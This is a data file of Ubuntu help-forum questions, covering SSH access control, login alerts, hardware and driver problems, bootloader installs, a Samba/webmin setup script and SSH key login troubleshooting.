444254	block remote access via ip ( or allowing access only from known ips )	i see a link on blocking remote access blocking remote login , which sets # listenaddress in /etc/ssh/sshd_config . but i would like to block a bunch of ips , such as those listed in http : //www.websworld.org/ , if there a simple way to do this blocking without having to change setting frequently ? moreover , is there a way to only allow remote login from specified ips ? ( say , any login try from br , cn , in , etc domains would be blocked ) . i see some instructions on using fail2ban , but it seems such changes need to be done quite frequently , such as daily ? ( i may see it wrong , would appreciate any enlightenment . ) thank you .
444258	32 bit backup on 64 bit operating system	is it it possible to restore a backup made on 32 bit ubuntu on a 64 bit version ? like if you backup a 32 bit os and restore it on a 64 bit version .
444261	dosbox issues in ubuntu 13.10	i am having some issues in windows 3.1 , running in dosbox . when i open desktop in control panel , dosbox closes unexpectedly . the issues started after running an update in ubuntu . does anybody have any suggestions to solve this problem ? thanks ! ! !
444262	speaker not working but headphone is working	my easynote mx45 running 12.04 was working fine and can hear sound either headphones or speakers . ( the sound card is hda intel ) but made a full installation of 13.10 version . and only have sound on headphones . if there is music playing and i unplug the headphones then the sound icon keep flashing fast . when open the sound control it looks crazy changing automatically from speaker to headphone . i would appreciate any help on this . i am not an expert but i can follow precise directions . enrique
444263	automatic notification of login from unknown ips/domains	is there a way to set up automatic email notification if your account at a linux server is accessed from a new ip/ domain ? this would be useful if some hacker gained access to your account ( clearly such access would be from an ip or a new domain unknown to you ) , and you got a notification by email immediately . if you happen to login from a new ip , you can ignore the email , but an email notification would be particularly useful if the login is more likely from a hacker . thank you .
444265	ca n't display menu bar , failed to install some packages	the first problem is occurred when i try to connect to my tv via hdmi on mirror display mode , while the system is upgrading from 12.04 64bits to 12.10 , windows are not displaying completely , menu bar and launcher were not displayed . i waited the upgrade to be finished and tried to reboot the computer , but the system could not starting up property , after grub , there was only black screen with a blinking underscore . i tried to boot recovery mode and normal start-up with both new and old kernel , none of them worked . then i entered text-only console using commands and upgraded to 13.10 . now i can enter the system with gui display . but now the menu bar turn dark , terminal is entirely dark , and the system prompted a third-party package was n't install property during the upgrade . i tried to install packages for color calibration and was failed . screenshot : https : //drive.google.com/file/d/0bwehevxjuipoufvcwfzntnhbre0/edit ? usp=sharing
444269	is it possible to have a separate unity launcher for each virtual workspace ?	i was wondering if there was a relatively straight forward ( or not ) way to have virtual launchers for each virtual workspace . i dislike the way a virtual workspace , say 3 , will jump to workspace 1 if i try to open a new application that is already open on 1 . thanks
444276	upgrading from xp	i have an old xp laptop running a 600m processor . i downloaded ubuntu . i have not run install yet . what is the next step ?
444277	arista transcoder not keeping the subtitles after convertion from mkv to mp4	i 'm trying to convert a tv show episode from mkv to mp4 to run on my psp and the mkv file has subtitles embedded , but when i use arista transcoder to convert , the result is a video without the subtitles . does someone knows how to fix it ? perhaps , i just need to change a parameter in the psp template on arista . thanks in advance .
444281	why does n't this bash script execute on ubuntu , but does on an online environment ?	i ca n't figure out why this does not work properly on ubuntu . it works great when i execute the script on compileonline ; but when i run it on a local server it does not give me the main menu and skips into reading the list of commands from the top . the script is supposed to be a menu system . based upon which selection the user inputs is what action happens . there are also comments so you can see what each section of code does . # ! /bin/su # ititialization function installsamba { sudo apt-get update sudo apt-get -y dist-upgrade sudo apt-get -y install git build-essential libacl1-dev libattr1-dev libblkid-dev libgnutls-dev libreadline-dev python-dev python-dnspython gdb pkg-config libpopt-dev libldap2-dev dnsutils libbsd-dev attr krb5-user docbook-xsl libcups2-dev acl git clone git : //git.samba.org/samba.git samba-master cd samba-master ./configure sudo make sudo make install sudo rm -f -r samba-master sed -i `` 5i path= $ path : /usr/local/samba/bin '' ~/.bashrc sed -i `` 5i path= $ path : /usr/local/samba/sbin '' ~/.bashrc sudo sed -i `` 5i path= $ path : /usr/local/samba/bin '' /root/.bashrc sudo sed -i `` 5i path= $ path : /usr/local/samba/sbin '' /root/.bashrc mainmenu } # this installs all of the necessary components for building samba then downloads samba from git . # after that it then compiles and installs samba and returns to the main menu . function installvsftpd { sudo apt-get update sudo apt-get -y dist-upgrade sudo apt-get -y install vsftpd mainmenu } # this installs vsftpd and return to the main menu . function installwebmin { wget http : //www.webmin.com/download/deb/webmin-current.deb sudo apt-get update sudo apt-get -y dist-upgrade sudo dpkg -i webmin-current.deb sudo apt-get -y install -f rm webmin-current.deb mainmenu } # this installs the current version of webmin and then returns to the main menu . function updatesystem { sudo apt-get update sudo apt-get -y dist-upgrade echo `` update complete ! '' echo `` it may be wise to restart your computer ... '' read -n 1 clear mainmenu } # this install the latest updates for the system and then returns to the main menu . function configuresambaforactivedirectory { sudo sed -i.original -r '/ [ \t ] \/ [ \t ] / { s/ ( ext4 [ \t ] * ) ( [ ^\t ] * ) /\1\2 , user_xattr , acl , barrier=1/ } ' /etc/fstab mount -a sudo /usr/local/samba/bin/samba-tool domain provision sudo mv /etc/krb5.conf /etc/krb5.conf.bak sudo cp /usr/local/samba/private/krb5.conf /etc/krb5.conf sudo sed -i `` 13i sudo /usr/local/samba/sbin/samba '' /etc/rc.local sudo /usr/local/samba/sbin/samba domaincontrolleryorn } # this function runs all of the necessary actions to make samba a domain controller . function domaincontrolleryorn { echo `` did you set this instalation as a primary domain controller ? '' echo `` '' echo `` if you select yes then it will upgrade the forrest and domain to '' echo `` server 2008 r2 levels . this may break compatibility with earlier '' echo `` versions of windows server . you can alwayse manually change the levels '' echo `` if you wish ... press wisely ! '' echo `` '' echo `` y or n : '' read -n 1 -p `` y or n : '' domaincontrolleryesorno if [ $ domaincontrolleryesorno = `` y '' ] ; then upgradeforrestanddomain elif [ `` $ $ domaincontrolleryesorno '' = `` n '' ] ; then clear echo `` samba configuration complete ! '' echo `` press any key to continue ... '' read -n 1 mainmenu elif [ `` $ $ domaincontrolleryesorno '' = `` n '' ] ; then clear echo `` samba configuration complete ! '' echo `` press any key to continue ... '' read -n 1 mainmenu elif [ `` $ $ domaincontrolleryesorno '' = `` y '' ] ; then upgradeforrestanddomain else echo `` please press either y or n ! ! ! '' echo `` '' echo `` press any key to continue ... '' read -n 1 clear domaincontrolleryorn fi } # this asks the user if he or she would like to upgrade the domain and forrest level . # if yes then it roputs the user to the code below . if not then the user is taken to the main menu . function upgradeforrestanddomain { sudo /usr/local/samba/bin/samba-tool domain level raise -- domain-level=2008_r2 sudo /usr/local/samba/bin/samba-tool domain level raise -- forest-level=2008_r2 sudo /usr/local/samba/bin/samba-tool domain passwordsettings set -- complexity=off echo `` domain controller setup has completed ! '' echo `` '' echo `` press any key to return to the main menu ... '' read -n 1 clear mainmenu } # this function upgrade the domain and forrest level to ( server ) 2008_r2 . # acceptable levels are 2008 and 2008 r2 . the default is 2003. function quitprogram { clear echo `` sorry to see you go ... : ( `` exit } # this is a simple good by program closer . # oh , did i mention that it stops the program ? function mainmenu { echo `` press 1 to update your system '' echo `` press 2 to install samba '' echo `` press 3 to install vsftpd '' echo `` press 4 to install the current version of webmin '' echo `` press 5 to configure samba for active directory '' echo `` press x to exit the script '' read -n 1 -p `` input selection : '' mainmenuinput if [ `` $ mainmenuinput '' = `` 1 '' ] ; then updatesystem elif [ `` $ mainmenuinput '' = `` 2 '' ] ; then installsamba elif [ `` $ mainmenuinput '' = `` 3 '' ] ; then installvsftpd elif [ `` $ mainmenuinput '' = `` 4 '' ] ; then installwebmin elif [ `` $ mainmenuinput '' = `` 5 '' ] ; then configuresambaforactivedirectory elif [ `` $ mainmenuinput '' = `` x '' ] ; then quitprogram elif [ `` $ mainmenuinput '' = `` x '' ] ; then quitprogram else echo `` you have entered an invallid selection ! '' echo `` please try again ! '' echo `` '' echo `` press any key to continue ... '' read -n 1 clear mainmenu fi } mainmenu # this executes the main menu function . # let the fun begin ! ! ! ! woot woot ! ! ! ! can someone help me out ?
444288	i 'm confused about ssd optimization	i 've tried to find out the deal with this , but i just ca n't . i have 3 drives in my rig . 1 240gb ssd , which i would like the main os to go on ( i have 16gb of ram so no swap needed ) , a 1 tb backup drive which will not be touched , and a 500gb drive for my /home and maybe /var . how can i optimize this to use trim for the ssd , set it up , etc ?
444289	how to log in using the tty ?	i 'm getting the following error and i read a solution in another post but i 'm having trouble with the first step which is logging into my credentials : your screen , graphics cards , and input device settings could not be detected correctly . you will need to configure these yourself . it 's embarrassing but it reads myusername login : so like when i boot up normally i enter in my password but then it asks for a password . so if my normal password goes in the latter what do i enter in the first part ? i hope i 'm not making myself look like an idiot here . i also apologize in advance if i 'm not following the correct posting rules but i 'm on a new cell phone with no access to another comp .
444290	switching windows and linux partitions	so basically i want to copy my windows partitions /dev/sdb1 and /dev/sdb2 to /dev/sda3 and /dev/sda4 i want to then move my linux partition of /dev/sda5 to /dev/sdb basically /deb/sdb is my primary drive ( why is it read as sdb if its the primary ? ) so i want to move linux to my primary drive so i have faster read/write speeds . if i just go and copy the windows partition and the linux partition and move them and then reinstall the bootloader will it all work ? or is this a huge no no . basically i need my windows partition to be where the linux one is and vise versa . i am fluent enough to go and do this all on my own . but i do not know if it will even work . will this work ? is there already a good tutorial i can follow or should i just go manually copy partitions and move them around ?
444292	how to set-up/enable fingerprint sensor ?	i have recently installed ubuntu 12.04 lts on my hp dm4-2180 laptop . i wanted to know if there is a way to enable/set-up the fingerprint sensor . i read through a few related thread and understand that not all make and models have fingerprint plugins available yet . the lsusb command yields following result : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 138a:0018 validity sensors , inc . bus 002 device 003 : id 10f1:1a2e importek please let me know . thanks
444295	cant install ubuntu on new asus g series laptop	i ca n't seem to install ubuntu 12.04 lts or 13.10 on my new asus g750jm-ds71 gaming laptop . i 've been using linux and ubuntu for my professional work for years and i 've never run into such a difficult ( and as yet for me undoable ) installation . in fact i dual installed windows 7 and 12.04 lts on my lenovo thinkpad as quickly and easily as the standard installation guide would have you believe is normal . i 'm not a linux guru by any stretch but i know enough to keep myself out of trouble ( or at least if i ca n't fix it , then fix it so nobody can ) . i tried the install with cd 's and live usbs with 12.04 and 13.10 in all possible combinations . and i have now seen a variety of error messages that i was n't aware of before . these errors ( although cryptic to me ) seem to be related to problems with uefi and possibly the hard drive partitioning . i 'll go through typical install as a way of stating my problems : attempt in uefi mode : the first error message i would see flashed briefly on a black screen ( saying something like failed ... /efi.boot ... /efi.boot as best as i can recall ) just before the black grub2 uefi installation or try ubuntu menu would appear . this error appears every time when using a cd , but strangely did n't appear when using a 12.04 liveusb . from here typically i launched the live os and tried the install from there . from here the installer dialogue indicated that 'this computer currently has no detected os ' , indicating for some reason the installer could not see windows 8.1 , which is installed . the laptop has a 1tb hard drive with the default 5 partitions from asus . also , several times when trying to look at my hdd partitions the installer crashed with 'ubuntu part-man failed with exit code 10 ... ' ( and 141 a different time ) . of cause i did n't go ahead with the install in uefi mode with all these problems . non uefi attempt : following the instruction guide at https : //help.ubuntu.com/community/uefi i reset my bios as follows : secure boot [ disabled ] fast boot [ disabled ] csm mode [ enabled ] i also tried the install with intel virtualization technology , intel aes-ni and vt-d , both enabled and disabled ( no luck either way ) . with these changes the install cd brought up the purple grub loader and i was able to complete the installation seemingly with no problem in non-uefi mode . i had the problem that the grub boot menu did n't appear and windows just booted straight up after the ubuntu install . i used the boot-repair tool as recommended . one thing i have n't yet mentioned is for some reason , neither the 12.04 or 13.10 install cds seem to have a driver for the wireless card on the new laptop , so i had to go to the computer store where i bought it and they reluctantly let me use there wired eth0 so i could complete the boot-repair . this got the grub2 to screen to load , which allowed me to find the ubuntu 13.10 installation was broken and just launched to a basic shell screen where machine style error was crash dumping on the screen something like : [ 47x.xxxxxx ] nouveau e [ pmc ] [ 0000:01:00.0 ] unknown intr 0x40000000 and requiring a hard shut down to stop the machine . from this experience i found out the asus backtracker program works well and i 've used it to restore my machine to just windows . i 'm completely stumped . i need linux now but cant seem to install it . thanks to the ubuntu team for your tireless effort in the face of microsoft ( possibly could rename themselves to megahard ) .
444297	how do you feed two audio inputs into one input using pulseaudio ?	i 'm very unfamiliar with pulse audio . that being said , i 'm trying to take the inputs from a line-in audio jack and a usb microphone and combine them into one virtual input device . anyone have a decent guide on this ? i 'm peeling through the documentation right now but have n't been able to spot anything .
444299	any chance of an amd64+mac iso for current lts , macpro ( orginal 1,1 2,1 : 32bit efi , hw 64bit )	back in the `` old days '' ubuntu had an installer that would work with the first intel macpro 's ( amd64+mac , i think 12.10 was the last version ) . is there any chance someone could write a thunk to enable installing on these `` hybrid '' machines ? i came back to ubnutu first , but could not get a current distro to install , then i walked thru the other linux/unix/bsd ( darwin ) based distros with the same results , that being unable to boot the dvd/usb , the closest i came was pcbsd , it at least would get past the 1 . 2 . select cd-rom boot type : but would not actually install . i am not looking to dual boot , just want a single os .
444305	open current folder as root removed in latest pcman file manager	in the latest version of the pcmanfm the option under tools-open current folder as root has been removed . is there a way to re-add the option ? i know i can open pcmanfm as root via the terminal but it was handy to open the specific folder under the tools option . also is there a way to add the option as a context menu entry ? i did n't understand the desktop file specification extension ( des-ema ) . i found this : [ desktop entry ] name = open as root tooltip = open the folder as root icon = terminal profiles = on_folder ; [ x-action-profile on_folder ] name = open as root mimetypes = inode/directory ; selectioncount = 1 exec = gksudo pcmanfm % s i then name the file pcman_root.desktop and place the file into : ~/.local/share/file-manager/actions . unfurtunately , i do not have the folder 'file-manager/actions ' under the ~/.local/share directory . am i supposed to create that specific folder ? i would very much appreciate any assistance .
444306	location of default lubuntu desktop images	i changed my lubuntu ( 13.10 ) 's default desktop background image to an original image . however , i want to go back to the default image , but i ca n't find where the image is on my computer- this means i ca n't choose it as a background . where is the location of the default lubuntu desktop image ?
444309	install the grub boot loader on hard disk fails	i have the following disk setup , raid5 : disk /dev/sda : 111.8 gib , 120034123776 bytes , 234441648 sectors disk /dev/sdb : 111.8 gib , 120034123776 bytes , 234441648 sectors disk /dev/sdc : 111.8 gib , 120034123776 bytes , 234441648 sectors disk /dev/md126 : 223.6 gib , 240063086592 bytes , 468873216 sectors at the `` install the grub boot loader on hard disk '' i get fatal error . what should i type in to get the install to work ? default : /dev/mapper tried : /dev/mapper , /dev/sda , /dev/sdb , /dev/sdc , /dev/md126 , /dev/sda1 , /dev/sdap1 , /dev/md126p1 , /dev/md126p2
444315	open office 4.0 for 32-bit architecture	apache is launched open office 4.0 stable version and open office 4.1 beta version . i downloaded both version and try to install stable version in my ubuntu 12.10 lts edition . after running the dpkg -i *.deb command all packages does not match the architecture of my ubuntu because my ubuntu is 32 bit and package is 64 bit . but downloaded package says that its for both architecture 32 bit or 64 bit . name of the package : apache_openoffice_4.0.1_linux_x86-64_install-deb_en-us.tar.gz so what can i do to install the open office 4.0.1 in my 32 bit system . i do n't want to use 64 bit dependencies for aoo 4.0.1 64 bit in my ubuntu os . help me guys update : desktop integration shows error errors were encountered while processing : openoffice4.0-debian-menus_4.0-9714_all.deb
444316	how to find fastest mirror from given list ?	i know that how do you select the fastest mirror from the command line ? exists , but it deals only with mirrors for ubuntu sources . i want a application/script/command which would find the best mirror/server from a given list , which may or may not be related to ubuntu . for example https : //www.archlinux.org/download/ gives a list of arch linux mirrors . similarly many softwares have multiple mirrors . i want to find the best mirror from the given list . i am ready to add the mirrors one by one into some script/app/command . if possible , the script/app/command should find the mirror which gives highest speed , rather than one that is closest .
444320	error when trying to remove g15daemon*	when i try to remove g15daemon i come up with this : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : g15daemon* 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/cache/apt/archives/ and when i try to update my system or install some packages from the ubuntu software center i get this error message : e : g15daemon : subprocess installed post-installation script returned error exit status 1 please help . i am running ubuntu 13.10 64-bit .
444322	re-enable working ppa 's after ubuntu upgrade	when i upgrade from 12.04 to 14.04 all my ppa 's disabled . whats the best way to re-enable working ppa in trusty ( 14.04 ) ? and i used y-ppa manager to re enable but y-ppa is not working in trusty .
444323	ssh key login to vps woes	i recently created a vps for web hosting purposes . everything was going fine until i decided that it 's time to add another account and disable root authentication . i added a new user to the sudoers group , added the public key to the /home/user/.ssh/authorized_keys file , checked all the file permissions , and the outcome is that i can only login via password authentication . when using the ssh key , this is the super super verbose output : chev @ linuxbox : ~/.ssh $ ssh -vvv user @ xxx.xxx.218.10 -p 25000 openssh_5.9p1 debian-5ubuntu1.2 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to xxx.xxx.218.10 [ xxx.xxx.218.10 ] port 25000. debug1 : connection established . debug3 : incorrect rsa1 identifier debug3 : could not load '' /home/chev/.ssh/id_rsa '' as a rsa1 public key debug1 : identity file /home/chev/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/chev/.ssh/id_rsa-cert type -1 debug1 : identity file /home/chev/.ssh/id_dsa type -1 debug1 : identity file /home/chev/.ssh/id_dsa-cert type -1 debug1 : identity file /home/chev/.ssh/id_ecdsa type -1 debug1 : identity file /home/chev/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.9p1 debian-5ubuntu1.2 debug1 : match : openssh_5.9p1 debian-5ubuntu1.2 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9p1 debian-5ubuntu1.2 debug2 : fd 3 setting o_nonblock debug3 : put_host_port : [ xxx.xxx.218.10 ] :25000 debug3 : load_hostkeys : loading entries for host `` [ xxx.xxx.218.10 ] :25000 '' from file `` /home/chev/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/chev/.ssh/known_hosts:19 debug3 : load_hostkeys : loaded 1 keys debug3 : order_hostkeyalgs : prefer hostkeyalgs : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 , ssh-rsa-cert-v01 @ openssh.com , ssh-dss-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss , ecdsa-sha2-nistp256 debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5 debug1 : kex : server- > client aes128-ctr hmac-md5 none debug2 : mac_setup : found hmac-md5 debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa xx : xx : xx : xx:65 : ef : d9:33:0c:55:58 : e3:9f:32:36:07 debug3 : put_host_port : [ xxx.xxx.218.10 ] :25000 debug3 : put_host_port : [ xxx.xxx.218.10 ] :25000 debug3 : load_hostkeys : loading entries for host `` [ xxx.xxx.218.10 ] :25000 '' from file `` /home/chev/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/chev/.ssh/known_hosts:19 debug3 : load_hostkeys : loaded 1 keys debug3 : load_hostkeys : loading entries for host '' [ xxx.xxx.218.10 ] :25000 '' from file `` /home/chev/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/chev/.ssh/known_hosts:19 debug3 : load_hostkeys : loaded 1 keys debug1 : host ' [ xxx.xxx.218.10 ] :25000 ' is known and matches the ecdsa host key . debug1 : found key in /home/chev/.ssh/known_hosts:19 debug1 : ssh_ecdsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/chev/.ssh/id_rsa ( 0xb8a7f868 ) debug2 : key : donotaccept @ gmx.com ( 0xb8a87c40 ) debug2 : key : /home/chev/.ssh/id_dsa ( ( nil ) ) debug2 : key : /home/chev/.ssh/id_ecdsa ( ( nil ) ) debug1 : authentications that can continue : publickey debug3 : start over , passed a different list publickey debug3 : preferred gssapi-keyex , gssapi-with-mic , publickey , keyboard-interactive , password debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive , password debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/chev/.ssh/id_rsa debug3 : send_pubkey_test debug2 : we sent a publickey packet , wait for reply debug1 : authentications that can continue : publickey debug1 : offering rsa public key : donotaccept @ gmx.com debug3 : send_pubkey_test debug2 : we sent a publickey packet , wait for reply debug1 : authentications that can continue : publickey debug1 : trying private key : /home/chev/.ssh/id_dsa debug3 : no such identity : /home/chev/.ssh/id_dsa debug1 : trying private key : /home/chev/.ssh/id_ecdsa debug3 : no such identity : /home/chev/.ssh/id_ecdsa debug2 : we did not send a packet , disable method debug1 : no more authentication methods to try . permission denied ( publickey ) . this happens with both the root and non-root account . after logging in with password , i also noticed that instead of user @ host : $ prompt i just get a `` $ '' prompt . i did create a home and .ssh folder , so not sure about that one , but more annoyed with not being able to login . also , this happens on port 22 as well . i 've spent the last 12 hours trying to get this to work . the only thing i can do is re-flash my vps and stick to root login with ssh key , which is not what i want . every time i try to change that setup , i run into a multitude of problems . can someone please offer some advice ?
444324	headphones test fine but give static during actual use	i 'm using a pair of simple headphones connected to the audio jack of my hp 2000 laptop running ubuntu 13.10 . i 've been having trouble with my headphones ever since i got them . today , they just gave me a lot of static all day to the point of being unusable . after reading a few webpages on this and trying to clean out the headphone jack with some isopropol alchol , they still gave me static . i tried testing them in sound settings . i heard front left and front right clearly and crisply and was stunned . what could have caused this ? is it some sort of interference from my microphone . that would be strange considering i have my mic on unamplified 100 % - off .
444325	how to make desktop entry for aptanastudio3.sh	whenever i try to run this command sh /opt/aptana_studio_3/aptanastudio3.sh for the aptana studio 3 from root directory it shows that /opt/aptana_studio_3/aptanastudio3.sh : 3 : /opt/aptana_studio_3/aptanastudio3.sh : ./aptanastudio3 : not found but when i go to the directory it is executed easily . since i made shortcut for the given file and it shows there was error launching the application and so i think the error as in the above command could be the reason for this . if there is something else please let me know . code for desktop entry [ desktop entry ] version=1.0 encoding=utf-8 name=aptana studio 3 genericname=integrated development environment comment=aptana strudio 3 integrated development environment exec=/opt/aptana_studio_3/aptanastudio3.sh tryexec=/opt/aptana_studio_3/aptanastudio3.sh icon=/opt/aptana_studio_3/as3.png startupnotify=true startupwmclass= '' aptana studio 3 '' terminal=true type=application mimetype=text/xml ; application/xhtml+xml ; application/x-javascript ; application/x-php ; application/x-java ; text/x-javascript ; text/html ; text/plain categories=gnome ; development ; ide ; so i need your help to figure this and make a working desktop entry for this program
444326	not seeing adb function in composite device without first running adb server	i have a composite usb modem device , including an adb function . i noticed that when connecting the device to the linux machine - while the adb daemon is not running - the device enumerates properly and shows properly in lsusb . the only exception to this is that the adb function does n't appear . in order to reproduce : run lsusb command on linux host - adb ( usbfs ) does not appear start adb server on linux host and run lsusb again - now you see usbfs in the results kill adb server and run lsusb - now you do n't see usbfs in the results is this behavior expected ?
444327	binary file wont run . how do i install it ?	i downloaded the 2.70 release of blender from the blender website ( blender.org ) and extracted the file to /home . the instructions in the readme say that i need to simply run the executable binary . however when i attempt to open the file nothing happens . i opened a bash and made the file executable , still no dice . what am i doing wrong here ? the terminal just tells me that it can not execute the binary file ... edit i do not want the build available from the software center as it is v2.62 . i already have this installed and am trying to intall the 2.7 build available from the website output from the console cromwell @ terminal : ~ $ sudo chmod +x /home/cromwell/blender-2.70-linux-glibc211-x86_64/blender [ sudo ] password for cromwell : cromwell @ terminal : ~ $ sudo /home/cromwell/blender-2.70-linux-glibc211-x86_64/blender /home/cromwell/blender-2.70-linux-glibc211-x86_64/blender : 2 : /home/cromwell/blender-2.70-linux-glibc211-x86_64/blender : syntax error : unterminated quoted string cromwell @ terminal : ~ $ ======================================================== cromwell @ terminal : / $ ls /home/cromwell/blender-2.70-linux-glibc211-x86_64 2.70 gpl3-license.txt license-bmonofont-i18n.ttf.txt blender gpl-license.txt license-droidsans.ttf.txt blenderplayer icons python-license.txt blender-softwaregl jemalloc-license.txt readme.html blender-thumbnailer.py lib copyright.txt license-bfont.ttf.txt
444330	overheating laptop when ubuntu is running ?	i am currently using hp dual boot windows 8 with ubuntu 12.04 . no problem with windows 8 but when i switch it in to ubuntu , it getting heat so much . even i cant work for much period of time it will thermal shutdown the machine . please tell me a solution but i need ubuntu can not replace with mint or anything else . my laptop details : hp 1000 notebook , core i3 , 4gb ram , amd radeon hd 6400m series vga
444331	fresh lubuntu install & wireless problems	i just installed lubuntu and the wireless connection does not work . no wireless connections show at all , but are visible on other machines . ethernet works fine , and in the previous version of ubuntu i was running the wireless worked fine ( do n't remember the version , but was from the pre forced unity days ) . the option to enable wireless is not even listed . the wireless card in my laptop is intel pro 2200bg in an old sony vaio . iwconfig shows `` no wireless extensions '' rfkill does not work i had to disable acpi to even install any of the latest distros on this machine , if that means anything . any help is appreciated , thank you
444334	issue regarding chrome remote desktop in 12.04 lts	i am using internet through proxy server.i want to insatll app chrome remote desktop on my computer but error `` an unexpected error occurred.please report this problem to the developers . `` occurring.please give me a solution .
444335	problem in netstat	i tried to check configured ports from hadoop user as , sudo netstat -p1ten | grep java but , i am getting result as , [ sudo ] password for hadoopz : hadoopz is not in the sudoers file . this incident will be reported . how to get sudo permission for hadoop user ? ?
444341	how to set up an environment to develop android apps in ubuntu that does n't have internet connectivity ?	i have an ubuntu laptop in which i need to develop android apps . i know that all that software could be downloaded from the software center but the problem is that i do n't have internet connectivity to that pc . instead , i have my friend 's computer ( running windows ) with internet . so is there any way to download those packages manually from windows pc and copy them to my pc and install them ?
